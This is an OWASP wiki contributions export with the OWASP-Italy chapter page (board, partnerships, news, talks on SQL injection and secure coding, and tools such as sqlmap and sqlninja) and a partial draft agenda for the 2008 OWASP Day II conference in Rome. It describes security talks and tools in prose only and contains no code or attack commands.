OWASP - User contributions [en]

Italy

2012-02-22T11:04:42Z

Icesurfer: /* OWASP-Italy Board */

<center>[[Image:OWASP-Italy.PNG]] </center>

==== WELCOME ====

{{Chapter Template|chaptername=Italy|extra=The chapter leader is [mailto:matteo.meucci@gmail.com Matteo Meucci]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-italy|emailarchives=http://lists.owasp.org/pipermail/owasp-italy}}

<paypal>Italy</paypal>

== OWASP-Italy Board ==

*This is the '''OWASP-Italy Board''':
Founder and Chair: Matteo Meucci (Jan 2005) Director of Communication: Raoul Chiesa Technical Director : Giorgio Fedon R&D Director: Stefano Di Paola, Paolo Perego Technical Writer Director: Lorenzo De Santis Italian Translation of docs and papers: Matteo Paolelli, Massimiliano Graziani. Official active members: Luca Carettoni, Antonio Parata, Carlo Pelliccioni, Claudio Merloni, Mauro Bregolin, Daniele Bellucci, Bernardo Damele, Alessio Marziali.

==== Partnerships ====

*IsecLab Partnership

[http://www.iseclab.org http://www.owasp.org/images/4/4b/LogoIsecLab.png]

We are beginning a collaboration with David Balzarotti and Marco Balduzzi of International Secure Systems Lab(IsecLab) with the goal of sharing and improving new WebAppSec projects. 

*CLUSIT Member

http://www.clusit.it/logo_clusit/clusit_logo_b130.gif

Thanks to CLUSIT and OWASP Foundation we have established a cross-membership between the two organizations. So OWASP-Italy is now a [http://www.clusit.it/soci.htm CLUSIT member] and CLUSIT is an OWASP Educational Member.

*ISACA Rome

[http://www.isacaroma.it http://www.owasp.org/images/9/98/Isacaroma.gif]

Thanks to Ugo Spaziani, we are developing seminars and new ideas with ISACA Rome. 

==== News ====

== Security Summit 2011 ==
- 15th March 2011, OWASP-Italy presented a seminar about OWASP news. 
Here you can download the presentations: 
- Matteo Meucci: "[http://www.owasp.org/images/5/51/Security_Summit_2011_-_Meucci.pdf OWASP Future and the OWASP Guidelines: how your company can adopt it to obtain best results]" 
- Paolo Perego: "[http://www.owasp.org/images/2/20/I_tool_OWASP_per_la_sicurezza_del_software_20110315.pdf OWASP tools for the Software Security]" 
- Giorgio Fedon: "[http://www.owasp.org/images/a/a0/Owasp_at_Security_Summit_2011_-_Mythbreaking_Automatic_Code_review_Tools.pdf Myth Busting Automatic Code Review tools]" 
More information here: https://www.securitysummit.it/eventi/view/24

'''OWASP Books are out!'''

Now you can download or buy a book on the OWASP Projects. Check it here: http://stores.lulu.com/owasp

==== Activities ====

*(Jun 10): OWASP Testing Guide presentation at FBK (Fondazione Bruno Kessler).

*(May 10): OWASP Training at London: last 28th May in London, OWASP leaders deliver a course focused on the main OWASP Projects. This course aims to change that by providing a selection of mature and enterprise ready projects together with practical examples of how to use them.
This Course was FREE for OWASP Members.
http://www.owasp.org/index.php/London/Training/OWASP_projects_and_resources_you_can_use_TODAY

*(Jan 09) OWASP Testing Guide v3 is finished! You can download or browse it [http://www.owasp.org/index.php/Category:OWASP_Testing_Project here]

*(Mar 07) Luca Carettoni has published an interview to OWASP-Italy (OWASP interviews OWASP :) )

[http://blog.html.it/archivi/2007/02/26/quattro-chiacchiere-con-owasp-italia.php Here] the full article.

*(Oct 06) ISACA Roma has published several interview with OWASP-Italy members:

[[http://www.isacaroma.it/html/newsletter/node/276 Matteo Meucci]] [[http://www.isacaroma.it/html/newsletter/node/287 Alberto Revelli]] [[http://www.isacaroma.it/html/newsletter/node/282 Antonio Parata]] [[http://www.isacaroma.it/html/newsletter/node/285 Paolo Perego]] [[http://www.isacaroma.it/html/newsletter/node/328 Carlo Pelliccioni]] 

*(Sep 06) Paolo Perego has created the new '''OWASP Orizon Project'''. Go to [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project OWASP Orizon Project] 

*(Sep 06) Matteo Meucci has been selected as the new editor of the '''OWASP Testing Guide v2'''. See OWASP [http://www.owasp.org/index.php/OWASP_Autumn_Of_Code_2006_:_Selected_Projects_Press_Release press release] and go to [http://www.owasp.org/index.php/OWASP_Autumn_of_Code_2006_-_Projects:_Testing_Guide OWASP Testing Project v2]

*(Sep 06) Carlo Pelliccioni is writing an article about the [http://www.owasp.org/index.php/Analysis_about_error_codes analysis of error codes] received by web servers.

*Top10 Vulnerabilities - OWASP-Italy survey:

[[Image:Top 10 vulnerabilities-mini.GIF]]

*(21 Jun 06) '''Infosecurity 2006''': the event is organized and managed by the CLUSIT.

Alberto Revelli and Matteo Meucci will partecipate as speakers at the seminar: "Web Application Security: guidelines and security auditing for web applications". [http://www.infosecurity.it/Roma/programma.php More info here]

*(1 Jun 06) '''"Quaderno CLUSIT"'''

CLUSIT has published a book entitled: "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP". Several OWASP-Italy members (R.Chiesa, L.De Santis, M.Graziani, L.Legato, M.Meucci, A.Revelli) have contributed to the writing. The document is now reserved to CLUSIT members, but will be made public in about 3 months.

*(31 May 06) Luca Carettoni has published the article '''"La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project".''' [http://sicurezza.html.it/articoli/leggi/1721/la-sicurezza-delle-applicazioni-web-secondo-lopen-/ Here]you can read the full article.

*(1 Mar 06) '''OWASP-Boston, Microsoft'''

Thanks to Jim Weiler, Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting. [http://www.owasp.org/local/boston.html More info here]

*(18 Nov 05) '''IDC - European Banking Forum'''

Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we will have a great speech at the [http://www.idc.com/italy/events/banking05/banking05_agenda.jsp IDC European IT Banking Forum 2005]. Agenda: - New standards for the ICT security auditing in the italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy and Matteo Meucci, OWASP-Italy Chair - Workshop: unusual form of attacks and banking system violation: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy

*(Oct 05) '''SMAU 2005''' is the 42a International ICT & Consumer Electronics Exhibition for Italy.

SMAU has accepted our submission! [http://www.webb.it/event/eventview/4488/1/progetto_owasp__case_study_di_applicativi_web_vulnerabili More info here]

*(Giu 05) Thanks to Massimiliano Graziani we have translated in italian the '''"OWASP Pen Test Checklist v.1.1"'''. You can download it [http://www.owasp.org/documentation/testing.html here.]

Thanks to the collaboration with CLUSIT, this doc is available also [http://www.clusit.it/whitepapers.htm here.]

*(May 05) '''ISACA Roma Newsletter''' has published an [http://www.isacaroma.it/html/newsletter/?q=node/78 interview to OWASP-Italy]

*(Apr 05) We have written an article describing the OWASP projects, Web Application Security and the next challenges. '''ICT Security'''.(the italian magazine about Information Security) has published the article on the number 33 - April 2005.

*The presentation of the seminar we have done in '''ISACA Rome''' (31th March 2005) is now available [http://www.isacaroma.it/pdf/050331/meucci.zip here.]

*(Apr 05) We have published a presentation describing a detailed case study of a web application vulnerabilty [http://www.owasp.org/images/7/72/MMS_Spoofing.ppt (MMS Spoofing)].

*(Mar 05) Thanks to Matteo Paolelli we have translated the '''"OWASP Top Ten Vulnerabilties in Web Application Security"''' in italian language. You can download it [http://www.owasp.org/docroot/owasp/projects/topten/OWASPTopTen2004-ITA.pdf here].

*[http://www.isacaroma.it/html/newsletter/?q=node/78 Here] you can read an interview talking about OWASP.

==== Events ====

=== 15th March, 2011 - OWASP-Italy@Security Summit ===

- 15th March 2011, OWASP-Italy presented a seminar about OWASP news. 
Here you can download the presentations: 
- Matteo Meucci: "[http://www.owasp.org/images/5/51/Security_Summit_2011_-_Meucci.pdf OWASP Future and the OWASP Guidelines: how your company can adopt it to obtain best results]" 
- Paolo Perego: "[http://www.owasp.org/images/2/20/I_tool_OWASP_per_la_sicurezza_del_software_20110315.pdf OWASP tools for the Software Security]" 
- Giorgio Fedon: "[http://www.owasp.org/images/a/a0/Owasp_at_Security_Summit_2011_-_Mythbreaking_Automatic_Code_review_Tools.pdf Myth Busting Automatic Code Review tools]" 
More information here: https://www.securitysummit.it/eventi/view/24

=== November, 2010 - OWASP-Italy Day V ===

- OWASP Day for E-Gov 2010: 9th November 2010 - Rome. 
An event organized by Consip. More information [http://www.owasp.org/index.php/Italy_OWASP_Day_E-Gov_10 here]

=== November, 2009 - OWASP-Italy Day IV ===

----
Following on from the great success of last OWASP Days the forth conference has taken place in November 2009 in Milan. 
More information [http://www.owasp.org/index.php/Italy_OWASP_Day_4 here] 

OWASP Day for E-Gov 2009: 5th November 2009 - Rome. 
More information [http://www.owasp.org/index.php/Italy_OWASP_Day_E-Gov_09 here]

=== 31st March, 2009 - OWASP-Italy @ PCI Milan ===

----

Matteo Meucci was invited to talk about OWASP Testing Guide and PCI-DSS Standard at the [http://www.pci-portal.com/lang-en/events/event-info/pcimilan PCI Milan event] last 31st March.

The presentation is published [http://www.owasp.org/images/3/38/MeucciPciMilan09.pdf here]

=== 23rd February, 2009 - OWASP Day III ===

----

[http://www.owasp.org/index.php/Italy_OWASP_Day_3 "Web Application Security: research meets industry"] Presentations are online!

=== 10th October, 2008 - Isaca Roma PCM 2008 ===

----

Matteo Meucci presented the new OWASP Projects and the Application Security in the Italian Companies. More information [http://www.isacaroma.it/html/ArchivioEventi-081010.html here]

=== 31st March, 2008 - OWASP Day II ===

----

[http://www.owasp.org/index.php/Italy_OWASP_Day_2 "The State of the Art of the Web Application Security and the OWASP guidelines in the Companies"] Presentations are online!

=== February 2008 - OWASP Italy at InfoSecurity 2008 ===

----

5th February:

*14:30 - The Owasp Orizon project: internals and hands on

[http://www.infosecurity.it/IT/eventi-sicurezza-informatica/convegni_94.aspx Paolo Perego]

6th February:

*14:30 - Costruire Software Sicuro dalle Fondamenta

[http://www.infosecurity.it/IT/eventi-sicurezza-informatica/convegni_128.aspx Antonio Parata]

7th February:

*10:30 - Tu programmi. Io buco.

[http://www.infosecurity.it/IT/eventi-sicurezza-informatica/convegni_137.aspx Luca Carettoni]

[http://www.infosecurity.it Here] you can read more information about it.

 

=== November 30th, 2007 - OWASP-Italy @ Elsag Datamat Security Forum ===

----

Matteo Meucci was invited to talk about OWASP Guidelines and SDLC Security at the Elsag Datamat Security Forum 2007 Where: Pescara When: 30th November 2007, h.12.30

=== October 20th, 2007 - OWASP Italy at SMAU E-Academy 2007 ===

----

Last 20th October 2007 we had 5 speeches at SMAU E-Academy 2007, here you can download our presentations:

*Giorgio Fedon, COO at Minded Security:

[http://www.owasp.org/.pdf "Dove sono finiti i miei soldi? Internet Banking e Cross Site Scripting"] (coming soon) [[Image:FedonSMAU07.pdf]]

*Paolo Perego, Senior Security Consultant at Spike Reply:

[https://www.owasp.org/images/7/79/PeregoSMAU07.ppt "The Owasp Orizon project - bring security at the source"]

*Antonio Parata, Security Consultant at eMaze:

"Valutazione del rischio tramite la logica fuzzy" (coming soon) [[Image:ParataSMAU07.pdf]]

*Alberto Revelli, Senior Security Consultant at Portcullis Security:

[http://www.owasp.org/images/9/9f/RevelliSMAU07.pdf "Anti-Anti-XSS: bypass delle difese del browser"]

*Stefano Di Paola, CTO at Minded Security:

"Cros-site Flashing! Gli attacchi Web di ultima generazione parlano multipiattaforma" (coming soon) [[Image:DiPaolaSMAU07.pdf]]

 

=== September 10th, 2007 - OWASP Day WorldWide: "Privacy in the 21st Century" ===

----

https://www.owasp.org/index.php/Italy_OWASP_Day_1

 

=== May 29th, 2007 - Seminar: "Software Security" ===

----

*Stefano Di Paola, Paolo Perego and Matteo Meucci will talk at the Seminar: [http://www.sicurinfo.it/informazioni/visinf.asp?IDInfo=246&CAT=53 "Which approaches to Software Security"] organized by Firenze Tecnologia.

 

=== May 15th-17th, 2007 - 6th OWASP AppSec Conference in Italy ===

----

*We are in the initial planning stages for the next OWASP Europe conference, which we plan to hold in Italy in May 2007.

[http://www.owasp.org/index.php/6th_OWASP_AppSec_Conference_-_Italy_2007 Here] you can find all the details about the conference, cfp and sponsorship.

=== April 14th, 2007 - Master on Information Security, University of Rome "La Sapienza" ===

----

*We have done a 4h seminar for the students of [http://mastersicurezza.uniroma1.it/ Master on Information Security at "La Sapienza"] for the [http://icsecurity.di.uniroma1.it/dokuwiki/doku.php?id=projects:asp Application Security Project of "La Sapienza" University.]

 

=== March 30th, 2007 - University of Rome "La Sapienza" ===

----

*Thanks to Prof. Mancini and Roberto D'Addario, we will talk about OWASP at the convention "Institutions, Companies and Information Security: comparing the problems"

[http://w3.uniroma1.it/security/Eventi/eventi.html Here] you can find more details.

 

=== March 1st, 2007 - EuSecWest 07 ===

----

Alberto Revelli and Matteo Meucci presented the new OWASP Testing Guide at [http://www.eusecwest.com/agenda.html EUSecWest]. [http://www.owasp.org/images/e/e9/OWASP_Testing_Guide_Presentation_EUSecWest07.zip Here] you take a look at the presentation.

=== February 6th-8th, 2007 - InfoSecurity ===

----

*February 6th:15.30

After the great success obtained form CCC at Berlin, Stefano Di Paola and Giorgio Fedon will talk about:" Web Security Client Side: attacks at Web 2.0" More information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=aqfi82GOKd6I748s1evI8Q%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

*February 6th:16.30

After the great effort on the Testing Guide Project, Matteo Meucci and Alberto Revelli will present: "The new OWASP Testing Guide" More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=nq6tSIuRoPVJBanBSsRiSQ%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

*February 7th:12.30

Authors of innovative SQL injection tools, Alberto Revelli and Antonio Parata will show: "Advanced SQL Injection: testing tools and defensive strategies." More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=3z04F5BgZRgfU0YX8JRYtA%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here]

*February 7th:13.30

Author of the new OWASP Orizon project, Paolo Perergo will present:"Secure programming: from theory to practice" More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=9HePIzyo5p29ylpGBl6CiA%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

=== January 25th, 2007 - Isaca Rome ===

----

Matteo Meucci will discuss the new [http://www.owasp.org/index.php/Category:OWASP_Testing_Project OWASP Testing Guide v2] For more information: http://www.isacaroma.it/html/GiornateDiStudio.html

=== October 7th, 2006 - SMAU 2006 ===

----

- "''The quest for secure code: code review and fundamental of secure coding.''" Matteo Meucci will present an introduction to the new OWASP Projects and OWASP-Italy activities. Paolo Perego (sp0nge) will speak about safe coding and the importance of code periodic review as natural software life cycle. Paolo will give a vision on code review and its phases http://www.webb.it/event/eventview/5772

Here are the presentations: [[Image:Meucci SMAU06.pdf|Meucci_SMAU06]] [[Image:Perego SMAU06.pdf|Perego_SMAU 06]]

- "''Advanced SQL Injection.''" Antonio Parata (S4tan) will explain SQL Injection, and how SQL Inference works on PHP/MySql platform. He will present an open source tool to support the testing. Alberto Revelli (icesurfer) will focus on Microsoft SQL Server: he will perform a live demo of sqlninja (http://sqlninja.sf.net), explaining how to obtain a pseudo-shell over SQL, how to escalate privileges, and how to play with the exotic equation: "SQL Injection + debug.exe + DNS = DOS prompt" ! http://www.webb.it/event/eventview/5774

[[Image:Revelli SMAU06.pdf|Revelli_SMAU06]] [[Image:Parata SMAU06.pdf|Parate_SMAU06]] 

[[Image:OWASP-Italy at SMAU06 2.JPG]] Luca, Carlo, Alberto, Antonio, Stefano Matteo, Paolo, Giorgio

=== September 29th, 2006 - OpenExp 2006 ===

----

September 30th, at 10:45 Antonio Parata (S4tan) will speak about SQL Injection: techniques, tools and practical examples.

Abstract: Antonio will introduce some basic concepts about software security. It will be shown how SQL Inference works on PHP/MySql platform and presented an open source tool to support the testing. Finally will be listed some advises to avoid common bugs. http://www.openexp.it/

OWASP-Italy will have a stand from September 29th to October 1st.

[[Image:Antonio Matteo Carlo.JPG]] [[Image:Antonio speech.JPG]] [[Image:Carlo.JPG]] [[Image:Claudio Luca.JPG]] [[Image:Mayhem Matteo.JPG]] [[Image:OWASP Banner2.JPG]] [[Image:OWASP Banner.JPG]]

=== June 21th, 2006 - InfoSecurity 2006 ===

----

Alberto Revelli and Matteo Meucci will partecipate as speakers at the seminar: "Web Application Security: guidelines and security auditing for web applications". The event is organized and managed by the CLUSIT.

Where: Sheraton Roma Hotel - Viale Del Pattinaggio, 100 When: 10,30 - 17,00 Who: Matteo Meucci and Alberto Revelli Link: http://www.infosecurity.it/Roma/programma.php

Agenda: -- I Session -- Introduction to Web Application Security • Which are the risks? • Risk assessment of a web application • Core pillars of web security How to develop secure web applications: • Guidelines and case-studies

-- II Session -- How to realize a security audit of a web application • The methodology OWASP Penetration Testing • The tools: OWASP WebScarab • Hands-on web application vulnerabilities: OWASP WebGoat • Advanced SQL Injection.

 

=== March 1st, 2006 - OWASP-Boston, Microsoft ===

----

Thanks to Jim Weiler (OWASP-Boston Chair), Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting of march. [http://www.owasp.org/index.php/Boston More info here]

=== November 5th, 2005 - IDC - European Banking Forum ===

----

Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we have had a great speech at the IDC European IT Banking Forum 2005 (18 Nov 2005). http://www.idc.com/italy/events/banking05/banking05_agenda.jsp Agenda:

*New standards for the ICT security auditing in the italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy and Matteo Meucci, OWASP-Italy Chair
*Workshop: unusual form of attacks and banking system violation: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy.

You can download the report [http://cdn.idc.com/italy/downloads/report_banking05_eng.pdf here].

You can download the Case-Study of a vulnerable Home Banking Web Application [http://www.owasp.org/docroot/owasp/misc/IDC_BankingForum05v1.ppt here].

=== October 5th, 2005 - OWASP-Italy@SMAU2005 ===

----

SMAU is the 42a International ICT & Consumer Electronics Exhibition for Italy. Alberto Revelli (our Technical Director) and Matteo Meucci have conducted a seminar talking about Web Application Security. Alberto has presented his new project: [http://sqlninja.sourceforge.net sqlninja]. Very cool!!

http://www.webb.it/event/eventview/4488/1/progetto_owasp__case_study_di_applicativi_web_vulnerabili

=== May 25th, 2005 - ISACA Rome 2nd meeting ===

----

May 25th we'll be in ISACA Rome to present OWASP WebGoat and a real case of a Web Application Vulnerability. Every one is invited to join the meeting.

Here is the agenda: 14.30 Registration 14.45 Matteo Meucci - Web Application Security Phase II - OWASP WebScarab and PenTest Checklist

*A case-study of a Web Application Vulnerability: MMS Spoofing

--- Web Application analysis --- Authentication and Billing of the MMS service --- Vulnerabilities --- Attack Analysis

*Learning the most common web application vulnerabilities: OWASP WebGoat

--- Http Basics --- HTML Clues --- Hidden Field Tampering --- How to spoof a Session Cookie --- Stored Cross Site Scripting --- Command Injection --- SQL Injection --- Fail Open Authentication

The meeting is hold at: Via Volturno, 65 (Rome) - Auditorium ATAC

You can download the presentation [http://www.isacaroma.it/pdf/050525/OWASP.zip here].

=== May 18th, 2005 - Workshop on Computer Crime 2005 ===

----

 May 18th, 2005 OWASP-Italy is invited to present OWASP Top 10 to the "Workshop on Computer Crime 2005" titled: "EVOLUZIONI NORMATIVE E RECENTI PROBLEMATICHE DI SICUREZZA"

The meeting is held at: Sala delle conferenze dell'Istituto Centrale della Banche Popolari Italiane Via Verziere, 11

You can download the presentation [http://www.owasp.org/images/a/aa/Top10-ComputerCrimes.ppt here].

=== March 31th, 2005 - ISACA Rome meeting ===

----

March 31th we'll be in ISACA Rome to present OWASP and the Web Application Security. Every one is invited to join the meeting.

Here is the agenda: 14.15 Registration 14.30 Matteo Meucci - Web Application Security - OWASP Guide: how to build secure web application - How to test your Web Application: WebScarab and the WebApp PenTest Checklist - How to learn the most common web application vulnerability: WebGoat - The Top Ten WebApp vulnerabilities - Common error on developing Web Application: Authentication mechanisms not "secure" Buffer Overflow and crash of the service Thief of identity: Cross Site Scripting Manipulation of company data: SQL Injection Reserved information: misconfiguration Bad session management and thief of identity - OWASP-Italy: projects and next challenges

The meeting is hold at: Via Volturno, 65 (Rome) - Auditorium ATAC http://www.isacaroma.it/html/GiornateDiStudio.html

You can download the presentation [http://www.isacaroma.it/pdf/050331/meucci.zip here].

=== March 21th, 2005 - OWASP-Italy conducts a seminar in AlmaWeb ===

----

March, the 21th OWASP-Italy has been invited at the University of Bologna to conduct a seminar regards to [http://www.almaweb.unibo.it/830.dyn Master in Management and Information Technology] titled “Web Application Security and OWASP”.

Here is the agenda: - OWASP & Web Application Security - Common Web Application Vulnerabilities - A real case of web application vulnerability: MMS Spoofing&Billing - Training: WebGoat

==== Publications ====

=== October 2009 Interview on "Il sole 24 ore" ===
----

[http://www.owasp.org/images/5/5c/Nova09.pdf Gary McGraw and Matteo Meucci] interviewed by NOVA, talking about BSIMM and OWASP.

=== March, 2007 Interview on HTML.it ===

----

Luca Carettoni has published an interview to OWASP-Italy (OWASP interviews OWASP :) ) [http://blog.html.it/archivi/2007/02/26/quattro-chiacchiere-con-owasp-italia.php Here] the full article.

=== October, 2006 ISACA Roma interviews OWASP-Italy ===

----

After the speeches that OWASP-Italy has done at [http://www.smau.it/catnews.asp?l=2&codcat=385 SMAU E-Academy 2006], ISACA Roma has interviewed some of the people of the Italian chapter. Follow the links for the full interviews (in italian): [[http://www.isacaroma.it/html/newsletter/node/276 Matteo Meucci]] [[http://www.isacaroma.it/html/newsletter/node/287 Alberto Revelli ]] [[http://www.isacaroma.it/html/newsletter/node/282 Antonio Parata]] [[http://www.isacaroma.it/html/newsletter/node/285 Paolo Perego]] [[http://www.isacaroma.it/html/newsletter/node/322 Stefano Di Paola & Giorgio Fedon]]

=== Aug, 2006 - Article on Banca Finanza magazine ===

----

Banca Finanza, the italian magazine about finance and banking, has interviewed Raoul Chiesa talking about the new risks for the on-line banking security. Raoul speaks about OWASP and web application security [[Media:042006BF.pdf]]

=== June, 2006 - Quaderno CLUSIT ===

----

CLUSIT has published a book entitled: "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP". Several OWASP-Italy members (R.Chiesa, L.De Santis, M.Graziani, L.Legato, M.Meucci, A.Revelli) have contributed to the writing. The document is now reserved to CLUSIT members, but it will be public in about 3 months.

=== June, 2006 - Paper on SQL Injection and Inference on PHP/MySQLInference ===

----

Antonio "s4tan" Parata has published an article about SQL Injection based on Inference for testing web application on PHP/MySQL platform. [http://www.ictsc.it/papers/sqlInferenceOnMySql.html Here]you can read the full article.

=== May, 2006 - Published an article about OWASP and Top-10 Vulnerabilities ===

----

Luca Carettoni has published the article "La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project". [http://sicurezza.html.it/articoli/leggi/1721/la-sicurezza-delle-applicazioni-web-secondo-lopen-/ Here]you can read the full article.

=== June, 2005 - OWASP Pen Test Checklist v 1.1 in Italian ===

----

Thanks to Massimiliano Graziani we have translated in italian the "OWASP Pen Test Checklist v.1.1". You can download it [http://www.owasp.org/documentation/testing.html here.] Thanks to the collaboration with CLUSIT, this doc is available also [http://www.clusit.it/whitepapers.htm here.]

=== May, 2005 - Isaca Roma Newsletter about OWASP-Italy ===

----

ISACA Roma Newsletter has published an [http://www.isacaroma.it/html/newsletter/?q=node/78 interview to OWASP-Italy]

=== April, 2005 - Published "MMS Spoofing" ===

----

We have published a presentation describing a detailed case study of a web application vulnerabilty [http://www.owasp.org/images/7/72/MMS_Spoofing.ppt (MMS Spoofing)].

Jim Hewitt, CISSP PMP working at CGI-AMS, affirms (slide#78): "Very interesting analysis of spoofed cell phone messaging and fraudulent billing". See: www.techvalleynyissa.org/Resources/2005_07_WebApplicationSecurity.ppt

=== April, 2005 - Published an article on ICT Security magazine ===

----

We have written an article describing the OWASP projects, Web Application Security and the next challenges. '''ICT Security'''.(the italian magazine about Information Security) has published the article on the number 33 - April 2005.

=== March, 2005 - OWASP Top-10 in Italian ===

----

Thanks to Matteo Paolelli we have translated the '''"OWASP Top Ten Vulnerabilties in Web Application Security"''' in italian language. You can download it [http://www.owasp.org/docroot/owasp/projects/topten/OWASPTopTen2004-ITA.pdf here].

 

----

==== Tools & Research ====

----

=== Nov, 2007 - sqlmap v0.5 ===

Bernardo Damele and Daniele Bellucci have released the fifth versions of the tool [http://sqlmap.sourceforge.net sqlmap]. sqlmap is an automatic SQL injection tool entirely developed in Python. It is capable to perform an extensive database management system back-end fingerprint, retrieve remote DBMS databases, usernames, tables, columns, enumerate entire DBMS, read system files and much more taking advantage of web application programming security flaws that lead to SQL injection vulnerabilities.

You can download the latest stable version from its [https://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107 SourceForge File List page] or the latest development version from its [https://sqlmap.svn.sourceforge.net/svnroot/sqlmap SourceForge SVN repository].

=== Dec, 2006 - sqlmap v0.2 ===

Bernardo Damele and Daniele Bellucci have released a second version of the tool "sqlmap" for Automatic Blind SQL Injection. [http://sqlmap.sourceforge.net/ Here] you can download the tool

=== September, 2006 - Wisec Project ===

Stefano Di Paola is developing Wisec - The Wiki Security Project [http://www.wisec.it Here] you can accesses the project.

=== July, 2006 - Sqlmap v0.0.1 ===

Daniele Bellucci has developed a first version of the tool "sqlmap" for Automatic Blind SQL Injection. [http://www.linux.it/~belch/?p=17 Here] you can download the tool

----

__NOTOC__ <headertabs />

[[Category:OWASP_Chapter]]
[[Category:Europe]]

Italy OWASP Day 2

2008-03-11T10:45:27Z

Icesurfer: /* OWASP Day II Italy - Conference Schedule - March 31st 2008 */

<center>'''OWASP Day 2: "The State of the Art of the Web Application Security and the OWASP guidelines in the Companies"'''

Centro Congressi dell'Università di Roma "La Sapienza"

31st March 2008 - Roma

[http://mastersicurezza.uniroma1.it http://www.owasp.org/images/7/7d/Master.jpg]
</center>
----

'''OWASP-Day Sponsors'''

<center>
[http://www.fortifysoftware.com http://www.owasp.org/images/d/d1/Fortify.JPG] [http://www.f5.com http://www.owasp.org/images/7/7e/50px-F5_50px.jpg] [http://www.watchfire.com http://www.owasp.org/images/0/01/Watchfire.gif] [http://www.ste.it http://www.owasp.org/images/0/0a/STE.jpg] [http://www.mindedsecurity.com https://www.owasp.org/images/1/1b/Logosmallminded2.png]
</center>

=== Introduction ===

Welcome to the OWASP Day II Italy Conference for 2008. Following on from the great success of OWASP Day I in 2007 the second conference will take place in March 2008.

* The conference represents a day of Web App Sec debate for all the OWASP chapters in the world during the week from 31st March to 5th April.

* Thanks to the collaboration with the Master in Information Security of the "La Sapienza" University, next 31st March we will host the Conference: "The State of the Art of the Web Application Security and the OWASP guidelines in the Companies".

* OWASP Day 2 is an all day Conference.

'''Topic:'''

Conference topics will be:
* The evolution of attacks and countermeasures for the security in the Web Application.

* Case studies of how the Companies have adopted the OWASP Guidelines in their SDLC.

'''Organization and goals:'''

* The event will show several points of discussion: during the first phase we will talk from a higher level of the topic, and then we will discuss the problem from a technical point of view.

* As conclusion of the day, we will organize a round table with international guests discussing the more interesting subjects come out during the event.

* Conference goal is that to create a debate on which will be the evolution of the Web Application Security.

== OWASP Day II Italy - Conference Schedule - March 31st 2008 ==

AGENDA (DRAFT):
<center>
<table width="80%">
<tr>
<td width=4%>9:00h</td><td bgcolor="#BCA57A" width=*>Registration</td>
</tr>
<tr>
<td valign=top>9.30h</td><td bgcolor="#eeeeee">"Welcome and open of the works" Prof. L.Mancini - Director of the Master in Information Security, Università "La Sapienza" Rome.</td>
</tr>
<tr>
<td valign=top>9.45h</td><td bgcolor="#b9c2dc">"Introduction to the OWASP Day II" Matteo Meucci - OWASP-Italy Chair, CEO Minded Security</td>
</tr>
<tr>
<td valign=top>10.00h</td><td bgcolor="#eeeeee">"L'implementazione dello sviluppo sicuro delle applicazioni secondo Telecom Italia" 
Marco Bavazzano - CISO TELECOM Italia</td>
</tr>
<tr>
<td valign=top>10.30h</td><td bgcolor="#b9c2dc">"SQL Injection tricks: building the bridge between the Web App and the
Operating System" Alberto Revelli - Portcullis Computer Security</td>
</tr>
<tr>
